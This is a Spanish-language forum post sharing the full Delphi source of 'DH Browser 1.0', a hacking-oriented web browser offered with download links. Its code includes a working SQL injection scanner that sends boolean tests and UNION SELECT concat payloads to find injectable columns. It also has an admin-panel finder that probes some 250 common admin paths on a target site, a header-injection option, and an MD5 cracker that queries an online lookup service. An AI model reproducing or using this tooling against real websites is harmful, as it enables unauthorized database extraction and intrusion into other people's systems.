Página 1 de 1

[Delphi] DH Browser 1.0

MensajePublicado:05 Sep 2016, 02:34
por Doddy
Un navegador web en Delphi con las siguientes opciones :

[+] Podes ver el codigo fuente de la pagina cargado
[+] Se puede modificar los headers para HTTP Header Injection
[+] Se puede buscar palabras en el codigo fuente
[+] SQLI Scanner incorporado
[+] Admin Finder incorporado
[+] Crack MD5 incorporado

Una imagen :



El codigo :
// DH Browser 1.0
// (C) Doddy Hackman 2016
// Credits :
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm

unit dh;

interface

uses
  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
  System.Classes, Vcl.Graphics,
  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls, Vcl.OleCtrls, SHDocVw,
  Vcl.Imaging.pngimage, Vcl.ExtCtrls, Vcl.ComCtrls, mshtml, Vcl.Menus,
  IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, PerlRegEx,
  IdMultipartFormData, Vcl.ImgList, Vcl.Styles.Utils.ComCtrls,
  Vcl.Styles.Utils.Menus,
  Vcl.Styles.Utils.SysStyleHook,
  Vcl.Styles.Utils.SysControls, Vcl.Styles.Utils.Forms,
  Vcl.Styles.Utils.StdCtrls, Vcl.Styles.Utils.ScreenTips;

type
  TFormHome = class(TForm)
    gbEnterPage: TGroupBox;
    btnEnter: TButton;
    gbHeaders: TGroupBox;
    mmHeaders: TMemo;
    GroupBox3: TGroupBox;
    GroupBox4: TGroupBox;
    gbAbout: TGroupBox;
    txtURL: TEdit;
    imgLogo: TImage;
    imgAbout: TImage;
    btnSQLI_Scanner: TButton;
    btnAdminFinder: TButton;
    btnCrack_MD5: TButton;
    btnSearch_for_text: TButton;
    cbUse_This_Headers: TCheckBox;
    browser: TWebBrowser;
    status: TStatusBar;
    progreso: TProgressBar;
    mmSource: TMemo;
    menu: TPopupMenu;
    ShowSourceHTML1: TMenuItem;
    ShowBrowser1: TMenuItem;
    nave: TIdHTTP;
    buscar_codigo: TFindDialog;
    ilIconos: TImageList;
    lblAbout: TLabel;
    procedure btnEnterClick(Sender: TObject);
    procedure browserDownloadComplete(Sender: TObject);
    procedure browserProgressChange(ASender: TObject;
      Progress, ProgressMax: Integer);
    procedure ShowSourceHTML1Click(Sender: TObject);
    procedure ShowBrowser1Click(Sender: TObject);
    procedure btnSQLI_ScannerClick(Sender: TObject);
    procedure btnAdminFinderClick(Sender: TObject);
    procedure btnCrack_MD5Click(Sender: TObject);
    procedure btnSearch_for_textClick(Sender: TObject);
    procedure buscar_codigoFind(Sender: TObject);
    procedure FormCreate(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  FormHome: TFormHome;

implementation

{$R *.dfm}

procedure TFormHome.btnAdminFinderClick(Sender: TObject);
const
  paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
    'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
    'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
    'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
    'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
    'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
    'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
    'login/index.asp', 'login/index.aspx', 'login/login.asp',
    'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
    'administracion/index.asp', 'administracion/index.aspx',
    'administracion/login.asp', 'administracion/login.aspx',
    'administracion/webmaster.asp', 'administracion/webmaster.aspx',
    'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
    'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php',
    'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php',
    'administracion/', 'administracion/index.php', 'administracion/login.php',
    'administracion/ingresar.php', 'administracion/admin.php',
    'administration/', 'administration/index.php', 'administration/login.php',
    'administrator/index.php', 'administrator/login.php',
    'administrator/system.php', 'system/', 'system/login.php', 'admin.php',
    'login.php', 'administrador.php', 'administration.php', 'administrator.php',
    'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php',
    'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
    'admin/account.php', 'admin/account.html', 'admin/index.html',
    'admin/login.html', 'admin/home.php', 'admin/controlpanel.html',
    'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
    'cp.php', 'cp.html', 'administrator/', 'administrator/index.html',
    'administrator/login.html', 'administrator/account.html',
    'administrator/account.php', 'administrator.html', 'login.html',
    'modelsearch/login.php', 'moderator.php', 'moderator.html',
    'moderator/login.php', 'moderator/login.html', 'moderator/admin.php',
    'moderator/admin.html', 'moderator/', 'account.php', 'account.html',
    'controlpanel/', 'controlpanel.php', 'controlpanel.html',
    'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
    'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp',
    'yonetici.asp', 'admin/account.asp', 'admin/home.asp',
    'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
    'administrator/index.asp', 'administrator/login.asp',
    'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
    'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
    'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
    'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
    'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
    'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
    'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
    'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
    'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
    'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
    'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
    'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
    'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
    'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
    'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
    'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
    'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
    'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
    'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
    'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
    'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
    'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
    'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
    'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/',
    'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/',
    'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/',
    'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/',
    'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/',
    'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/',
    'database_administration/', 'power_user/', 'system_administration/',
    'ss_vms_admin_sm/');
var
  i: Integer;
  control: Integer;

var
  cabeceras: OLEVariant;
  uno: OLEVariant;
  dos: OLEVariant;
  tres: OLEVariant;

begin

  if not(txtURL.Text = '') then
  begin
    control := 0;

    status.Panels[0].Text := '[+] Finding Panel ....';
    FormHome.status.Update;

    for i := Low(paginas) to High(paginas) do

      if (control = 1) then
      begin
        Abort;
      end
      else
      begin

        try

          status.Panels[0].Text := '[+] Testing : ' + paginas[i];
          FormHome.status.Update;

          nave.Get(txtURL.Text + '/' + paginas[i]);
          if nave.ResponseCode = 200 then
          begin

            txtURL.Text := txtURL.Text + '/' + paginas[i];

            uno := navNoReadFromCache or navNoWriteToCache;
            dos := '';
            tres := '';

            if (cbUse_This_Headers.Checked) then
            begin
              cabeceras := mmHeaders.Text;
              browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
            end
            else
            begin
              cabeceras := '';
              browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
            end;
            control := 1;
            status.Panels[0].Text := '[+] Panel Found';
            FormHome.status.Update;
            MessageBox(0, 'Panel Found', 'DH Browser 1.0', MB_ICONINFORMATION);
            Abort;
          end;
        except
          on E: EIdHttpProtocolException do;
          on E: Exception do;
        end;

      end;

    status.Panels[0].Text := '[-] Panel not found';
    FormHome.status.Update;
    MessageBox(0, 'Panel not found', 'DH Browser 1.0', MB_ICONERROR);
  end
  else
  begin
    MessageBox(0, 'Enter URL', 'DH Browser 1.0', MB_ICONINFORMATION);
  end;

end;

procedure TFormHome.browserDownloadComplete(Sender: TObject);
var
  buscador: IHTMLElement;
begin

  progreso.Position := 0;

  status.Panels[0].Text := '[+] Page loaded';
  FormHome.status.Update;

  // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm

  begin

    try
      begin

        mmSource.Clear;

        buscador := (browser.Document AS IHTMLDocument2).body;

        while not(buscador.parentElement = nil) do
        begin
          buscador := buscador.parentElement;
        end;
        mmSource.Lines.Add(buscador.outerHTML);
      end;
    except
      // ??
    end;
  end;
end;

procedure TFormHome.browserProgressChange(ASender: TObject;
  Progress, ProgressMax: Integer);
begin
  progreso.Max := ProgressMax;
  progreso.Position := Progress;
end;

procedure TFormHome.buscar_codigoFind(Sender: TObject);
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143

var
  aca: PChar;
  aca2: PChar;
  acatoy: PChar;
  acatoy2: Word;

begin

  With Sender as TFindDialog do

  begin

    GetMem(aca2, Length(FindText) + 1);
    StrPCopy(aca2, FindText);

    acatoy2 := mmSource.GetTextLen + 1;
    GetMem(aca, acatoy2);

    mmSource.GetTextBuf(aca, acatoy2);

    acatoy := aca + mmSource.SelStart + mmSource.SelLength;
    acatoy := StrPos(acatoy, aca2);

    if not(acatoy = NIL) then
    begin
      mmSource.SelStart := acatoy - aca;
      mmSource.SelLength := Length(FindText);
    end;

    mmSource.SetFocus;

  end;

end;

procedure TFormHome.btnCrack_MD5Click(Sender: TObject);
var
  md5: string;
  datos: TIdMultiPartFormDataStream;
  code: string;
  regex_check: TPerlRegEx;
  cracked: string;
begin

  md5 := InputBox('DH Browser 1.0', 'MD5 : ', '');

  if not(md5 = '') then
  begin
    regex_check := TPerlRegEx.Create();
    datos := TIdMultiPartFormDataStream.Create;
    datos.AddFormField('pass', md5);
    datos.AddFormField('option', 'hash2text');
    datos.AddFormField('send', 'Submit');

    status.Panels[0].Text := '[+] Cracking ...';
    FormHome.status.Update;

    code := nave.Post('http://md5online.net/index.php', datos);

    regex_check.regex :=
      '<center><p>md5 :<b>(.*?)</b> <br>pass : <b>(.*?)</b></p>';
    regex_check.Subject := code;

    if regex_check.Match then
    begin
      cracked := regex_check.Groups[2];
      status.Panels[0].Text := '[+] MD5 Cracked : ' + cracked;
      FormHome.status.Update;
      MessageBox(0, PChar('MD5 Cracked : ' + cracked), 'DH Browser 1.0',
        MB_ICONINFORMATION);

    end
    else
    begin
      status.Panels[0].Text := '[-] Not found';
      FormHome.status.Update;
      MessageBox(0, 'Not found', 'DH Browser 1.0', MB_ICONERROR);
    end;
  end;

end;

procedure TFormHome.btnEnterClick(Sender: TObject);
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242

var

  cabeceras: OLEVariant;
  uno: OLEVariant;
  dos: OLEVariant;
  tres: OLEVariant;

begin

  uno := navNoReadFromCache or navNoWriteToCache;
  dos := '';
  tres := '';

  if (cbUse_This_Headers.Checked) then
  begin
    cabeceras := mmHeaders.Text;
    browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
  end
  else
  begin
    cabeceras := '';
    browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
  end;

end;

procedure TFormHome.FormCreate(Sender: TObject);
begin
  UseLatestCommonDialogs := False;
end;

procedure TFormHome.btnSearch_for_textClick(Sender: TObject);
begin
  buscar_codigo.Execute;
end;

procedure TFormHome.ShowBrowser1Click(Sender: TObject);
begin
  browser.Visible := True;
  mmSource.Visible := False;
end;

procedure TFormHome.ShowSourceHTML1Click(Sender: TObject);
begin
  browser.Visible := False;
  mmSource.Visible := True;
end;

procedure TFormHome.btnSQLI_ScannerClick(Sender: TObject);
var
  pass1: string;
  pass2: string;
  code: string;
  urltest: string;
  urlgen: string;
  full: string;
  codedos: string;
  i: Integer;
  regex_check: TPerlRegEx;

var

  cabeceras: OLEVariant;
  uno: OLEVariant;
  dos: OLEVariant;
  tres: OLEVariant;

begin

  if not(txtURL.Text = '') then
  begin
    regex_check := TPerlRegEx.Create();

    status.Panels[0].Text := '[+] SQLI Scanning ...';
    FormHome.status.Update;

    pass1 := '+';
    pass2 := '--';

    urltest := 'concat(0x4b30425241,1,0x4b30425241)';

    status.Panels[0].Text := '[+] Checking ...';
    FormHome.status.Update;

    code := nave.Get(txtURL.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);

    codedos := nave.Get(txtURL.Text + '1' + pass1 + 'and' + pass1 +
      '1=0' + pass2);

    if not(code = codedos) then
    begin

      status.Panels[0].Text := '[+] Finding columns number';
      FormHome.status.Update;

      urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
        'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
      urlgen := '1';
      for i := 2 to 36 do
      begin

        status.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
        FormHome.status.Update;
        urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i) +
          ',0x4b30425241)';
        urlgen := urlgen + ',' + IntToStr(i);
        code := nave.Get(txtURL.Text + urltest + pass2);

        regex_check.regex := 'K0BRA(.*?)K0BRA';
        regex_check.Subject := code;

        if regex_check.Match then
        begin

          urlgen := StringReplace(urlgen, regex_check.Groups[1], 'hackman', []);
          full := txtURL.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
            'union' + pass1 + 'select' + pass1 + urlgen;

          txtURL.Text := full;

          uno := navNoReadFromCache or navNoWriteToCache;
          dos := '';
          tres := '';

          if (cbUse_This_Headers.Checked) then
          begin
            cabeceras := mmHeaders.Text;
            browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
          end
          else
          begin
            cabeceras := '';
            browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
          end;
          status.Panels[0].Text := '[+] SQI Scanner Finished';
          FormHome.status.Update;
          MessageBox(0, 'SQI Scanner Finished', 'DH Browser 1.0',
            MB_ICONINFORMATION);

          Abort;

        end;

      end;
      status.Panels[0].Text := '[-] Columns length not found';
      FormHome.status.Update;
      MessageBox(0, 'Columns length not found', 'DH Browser 1.0', MB_ICONERROR);
    end
    else
    begin
      status.Panels[0].Text := '[-] Not vulnerable';
      FormHome.status.Update;
      MessageBox(0, 'Not vulnerable', 'DH Browser 1.0', MB_ICONERROR);
    end;

    status.Panels[0].Text := '[+] Done';
    FormHome.status.Update;
  end
  else
  begin
    MessageBox(0, 'Enter URL', 'DH Browser 1.0', MB_ICONINFORMATION);
  end;

end;

end.

// The End ?
Si quieren bajar el programa lo pueden hacer de aca :

[ Debe registrarse para ver este enlace ].
[ Debe registrarse para ver este enlace ].

Eso seria todo.